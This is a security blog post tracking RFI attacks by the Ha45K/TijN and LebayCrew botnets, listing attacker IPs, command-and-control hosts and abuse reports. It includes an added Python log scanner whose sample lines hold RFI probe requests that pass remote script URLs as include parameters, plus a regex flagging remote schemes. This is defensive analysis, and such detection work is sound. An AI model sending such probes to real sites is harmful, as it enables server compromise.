Ha45K / TijN botnets : RFI Attacks

I have noticed an increase of the “generics attacks” on my website over the last few days: https://www.malekal.com/modsec/ (blue line on the first graph).

A check shows that some RFI attacks are increasing.

A few days ago:
https://www.malekal.com/modsec/index.php?ip=1.224.163.80
https://www.malekal.com/modsec/index.php?ip=71.6.150.241

Latest attacks:
https://www.malekal.com/modsec/index.php?ip=46.252.18.54
https://www.malekal.com/modsec/index.php?ip=95.168.199.227

All the attacks against my websites (42 distinct IPs, so not that many):
27.156.77.42
27.151.108.111
110.87.155.52
70.32.104.222
108.59.11.193
178.33.122.140
117.25.73.41
117.25.73.207
69.167.158.139
95.110.243.173
181.65.186.35
77.68.37.155
203.124.10.81
107.6.20.170
176.31.252.38
50.21.183.38
66.158.191.204
91.209.108.152
222.77.192.91
69.36.182.205
50.28.14.54
80.68.145.110
94.246.128.46
91.121.6.123
211.47.181.38
71.6.150.241
112.218.68.155
1.224.163.80
212.34.151.164
180.179.212.185
154.41.66.23
95.168.199.227
46.252.18.54
198.50.146.246
178.33.226.103
118.129.167.63
203.58.0.155
118.129.167.21

The RFI attacks were trying to download a Perl script that connects to scary.angels-agency.nl

[image: Ha45K_scarys_angels-agency]

It then connects to 58.150.55.36 (also using the DNS name ha45k.hopto.org)

[image: Ha45K_rfi_attacks3]

I sent an abuse report for this.

[image: Ha45K_scarys_angels-agency_abuse]

The result:

no-ip has taken action: ha45k.hopto.org now has address 0.0.0.0

and scary.angels-agency.nl is also suspended.
58.150.55.36 is still up.

Actually, the RFI attacks send a script to gather information from the victim server (and to check whether the RFI attack was successful):

[image: Ha45K_rfi_sh]

bt.php is still around, and now connects to 58.150.55.36, already mentioned in the abuse email I sent.

[image: Ha45K_rfi_bt]
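Detection logic for this kind of RFI probe, as an added example that is not part of the original post and not taken from Ha45K's tooling or from the malekal.com modsec page: it parses Apache combined-log lines (the sample lines, IPs and file names below are constructed) and flags requests whose query parameters carry a remote URL or a PHP stream wrapper, which is what a remote include needs in order to fetch a script like the bt.php mentioned above.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample Apache combined-log lines (not from the original page).
# Line 1 and 3 mimic RFI probes, line 2 is a normal request, line 4 is a
# legitimate-looking redirect parameter that the heuristic will also flag.
SAMPLE_LOG = """\
203.0.113.10 - - [20/Feb/2014:10:01:02 +0100] "GET /index.php?page=http://198.51.100.7/bt.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.11 - - [20/Feb/2014:10:01:05 +0100] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.12 - - [20/Feb/2014:10:01:09 +0100] "GET /wp-content/plugins/x.php?file=ftp%3A%2F%2F198.51.100.8%2Fsh.txt HTTP/1.1" 404 300 "-" "libwww-perl/5.8"
203.0.113.13 - - [20/Feb/2014:10:01:15 +0100] "GET /index.php?redirect=https://example.org/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Schemes and PHP stream wrappers that an include() would resolve over the
# network or turn into code. Matched case-insensitively on the decoded value.
REMOTE_SCHEME_RE = re.compile(r'^(https?|ftps?|php|data|expect)://', re.IGNORECASE)


def parse_line(line):
    """Split one combined-log line into its fields, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def rfi_candidates(target):
    """Return (param, decoded value) pairs whose value looks like a remote include target."""
    query = urlsplit(target).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl already decoded once; a second unquote catches double-encoded values
        decoded = unquote(value)
        if REMOTE_SCHEME_RE.match(decoded):
            hits.append((name, decoded))
    return hits


def scan_log(text):
    """Return one alert dict per suspicious parameter found in the log text."""
    alerts = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rfi_candidates(rec["target"]):
            alerts.append({
                "ip": rec["ip"],
                "param": name,
                "url": value,
                "status": int(rec["status"]),
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f'{alert["ip"]} param={alert["param"]} status={alert["status"]} -> {alert["url"]}')
```

The heuristic alerts on any parameter that carries a remote URL, so the fourth sample line (a redirect parameter) is reported alongside the two probes; triage on the response status, the parameter name and whether the fetched path is a text file ending in `?`, as in the first line, separates real RFI attempts from open-redirect noise. On the server side the include itself is blocked by keeping `allow_url_include` off in php.ini, which is its default.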

Some shells around:

[image: Ha45K_rfi_attacks2]

and the RFI attacks sent by the botmaster:

[image: Ha45K_rfi_attacks]


The guy Ha45K seems to be active on the HF forum and the unknown.eu forum.
He is also using the nickname TijN (used in the identd): download.adamas.ai/dlbase/ezines/TeaMp0isoN/ezine1.txt
And he has been doing this for a while now, since April 2013: https://defense.ballastsecurity.net/decoding/?raw=36173d0a9b460a8089d55086d39aa77d

[image: Ha45K_TijN]


EDIT – February 24

It seems Ha45K has read this entry and is trying to spam something:

[image: Ha45K_spam]

and some spam attacks:

[image: Ha45K_spam3]

We can see the generics attack peak: https://www.malekal.com/modsec/index.php

[image: Ha45K_spam2]

They moved to 188.165.17.104 (OVH) and 62.109.4.70 (THEFIRST-NET – RU).
OVH has done the job and 188.165.17.104 is clean now.

By the way, another active RFI group: LebayCrew
https://www.malekal.com/modsec/index.php?ip=212.227.119.175
https://www.malekal.com/modsec/index.php?ip=203.58.0.155

IRCd : 212.19.3.130 (REDCOM-SRV-WEBHOST – RU)

[image: lebay_crew_RFI]

Some scans:

[image: lebay_crew_RFI_scan]


Securing your website

You can also take a look at the page: [network] Securing an Apache/PHP/MySQL (LAMP) server, and the index leading to various resources for securing your website
